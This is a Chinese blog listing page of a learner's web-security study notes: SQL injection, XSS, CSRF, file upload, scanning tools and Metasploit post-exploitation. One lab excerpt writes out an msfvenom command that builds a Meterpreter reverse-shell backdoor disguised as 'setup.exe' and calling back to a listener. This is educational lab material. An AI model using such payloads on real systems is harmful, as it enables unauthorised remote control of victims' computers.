安全
文章平均质量分 95
家住海边就爱浪吖
这个作者很懒,什么都没留下…
展开
-
WEB安全扫盲公开课---学习笔记(一)
观看链接https://www.bugbank.cn/live/websm?tdsourcetag=s_pcqq_aiomsg第1讲http常见的请求方法:GET POST PUT COPY DELETE OPTIONShttp状态码web安全五层模型第2讲网络拓扑图第3讲phpstudypython第4 讲OWASP TOP 10http:...原创 2019-08-07 10:30:36 · 1127 阅读 · 0 评论 -
Kali利用MSF渗透Win 7获取shell
首先在kali上制作一个后门程序,文件名为:setup.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe#本地监听地址及端口号:192.168.1.100:5050为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...原创 2019-09-13 23:33:01 · 3445 阅读 · 0 评论 -
Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透
5.5 后渗透攻击:信息收集Metasploit提供了一个非常强大的后渗透工具------Meterpreter,该工具具有多重功能,后期渗透模块有200多个,Meterpreter有以下优势。纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用,适用于Windows、Li...原创 2019-09-13 21:31:48 · 2237 阅读 · 1 评论 -
Web安全攻防-----学习笔记(五)之Metasploit技术
第5章 Metasploit技术apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 apt-get dist-upgrade:升级整个Linux系统。5.2 Metasploit基础5.2.1 专业术语MSF框架由多个模...原创 2019-09-12 16:08:01 · 404 阅读 · 0 评论 -
Web安全攻防-----学习笔记(四)之暴力破解、命令执行
4.9 暴力破解“暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我...原创 2019-09-12 11:35:58 · 801 阅读 · 0 评论 -
Web安全攻防-----学习笔记(四)之文件上传
4.8 文件上传4.8.2 有关知识1.原因上传文件时,如果服务端未代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上传脚本文件(asp、aspx、php、jsp等格式的文件)2.危害非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本文件,又被称为WebShell,也可将WebShell脚本称为一种网页后门。4...原创 2019-09-11 21:43:42 · 529 阅读 · 0 评论 -
Web安全攻防-----学习笔记(四)之CSRF与CSRF
4.6 CSRF漏洞CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行也难以防范。4.6.2 利用CSRF漏...原创 2019-09-10 22:13:36 · 328 阅读 · 0 评论 -
Web安全攻防-----学习笔记(四)之XSS
4.4 XSS基础跨站脚本(Cross-Site Scripting)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。XSS攻击可以分为三种:反射型、存储型、DOM型。4.4.2 XSS漏洞原理1. 反射型XSS反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。2.存储型XSS又称持...原创 2019-09-10 20:05:38 · 2671 阅读 · 0 评论 -
Web安全攻防-----学习笔记(四)之SQL注入
第四章Web安全原理剖析4.1 SQL注入的基础建议学习(菜鸟教程):https://www.runoob.com/sql/sql-function.html4.1.3 与MySQL注入相关的知识点在MySQL 5.0版本之后,MySQL默认在数据库中存放一个"information_schema"的数据库,在该库中,需记住三个表名,分别是SCHEMATA、TABLES和COLUM...原创 2019-09-09 22:42:54 · 611 阅读 · 0 评论 -
Web安全攻防-----学习笔记(三)之Nmap
3.3 Nmap详解Network Mapper:网络映射器,它被设计用来快速扫描大型网络,包括主机探测与发现、开放的端口情况、操作系统与应用服务指纹识别、WAF识别及常见安全漏洞。它的图形化界面是Zenmap,分布式框架为DNmap。3.3.2 NMap入门3.3.2.1 扫描参数设置扫描目标:-iL 从文件中导入目标主机或目标网段 -iR 随机选择目标主机 -e...原创 2019-09-08 16:14:21 · 672 阅读 · 0 评论 -
Web安全攻防-----学习笔记(三)之Burp Suite
3.2 Burp Suite 详解3.2.2 Burp Suite入门 Burp Suite 代理工具是以拦截代理的方式,拦截所有通过代理的网络流量,如客户端的请求数据,服务器端的返回信息等。它主要拦截HTTP和HTTPS协议的流量,通过拦截,Burp Suite以中间人的方式对客户端的请求数据、服务端的返回信息做各种处理,以达到安全测试的目的。以火狐为例,设置代理信息:点...原创 2019-09-08 13:44:12 · 687 阅读 · 0 评论 -
Web安全攻防-----学习笔记(三)之SQLMap
第3章 常用的渗透测试工具3.1 SQLMap详解SQLMap采用了五种独特的SQL注入技术:基于布尔类型的盲注,可以根据返回页面 判断条件真假 的注入 基于时间的盲注,不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断 基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回到页面中 联合查询注入,在可以使用...原创 2019-09-07 15:23:58 · 550 阅读 · 0 评论 -
Web安全攻防-----学习笔记(二)
第2章 搭建漏洞环境及实战在线练习平台:https://www.ms08067.com/about/bachang.html2.1在linux系统中安装LANMPLANMP是linux下Apache、Nginx、MySql和PHP的应用环境,本节演示WDLinux的一款集成安装包,首先下载安装包,命令如下:wget http://dl.wdlinux.cn/files/lanmp...原创 2019-09-07 13:51:09 · 766 阅读 · 0 评论 -
Web安全攻防-----学习笔记(一)
参考书籍:Web安全攻防-渗透测试实战指南 徐焱(yan\)李文轩 等配套资源网址:https://www.ms08067.com/第1章--渗透测试之信息收集1.1whois查询1.2收集敏感信息1.3收集子域名信息1.子域名检测工具,Layer子域名挖掘机、Sublist3r和subDomainsBrute2.收索引擎枚举3.第三方聚合应用枚举4.证书透...原创 2019-09-07 13:49:41 · 1851 阅读 · 0 评论 -
WEB安全扫盲公开课---学习笔记(二)
第16讲0x01.AWVS简介、简单扫描—HTTP Editor模块介绍AWVS通过网络爬虫来测试网站安全0x02.AWVS的web服务器发现0x03.AWVS爬虫模块的使用0x04.AWVS-FUZZ模块的使用主要用于爆破,目录的扫描0x05.AWVS-Http Sniffer模块的使用0x06.AWVS subdomain scanner的使用详细教程h...原创 2019-09-06 22:00:13 · 174 阅读 · 0 评论 -
Web安全攻防-----学习笔记(五)之后渗透攻击:权限提升
5.6 后渗透攻击:权限提升通常获取的权限为Guest或User权限,必须将访问权限从Guest提升到User,再到Administrator,最后到System级别。提升权限的方式有两种:纵向提权:低权限角色获得高权限角色的权限 横向提权:获取同级别角色的权限输入shell进入目标机的cmd命令行,利用命令查看我们当前的权限:whoami /groups说明当前是一个标...原创 2019-09-14 11:14:30 · 941 阅读 · 0 评论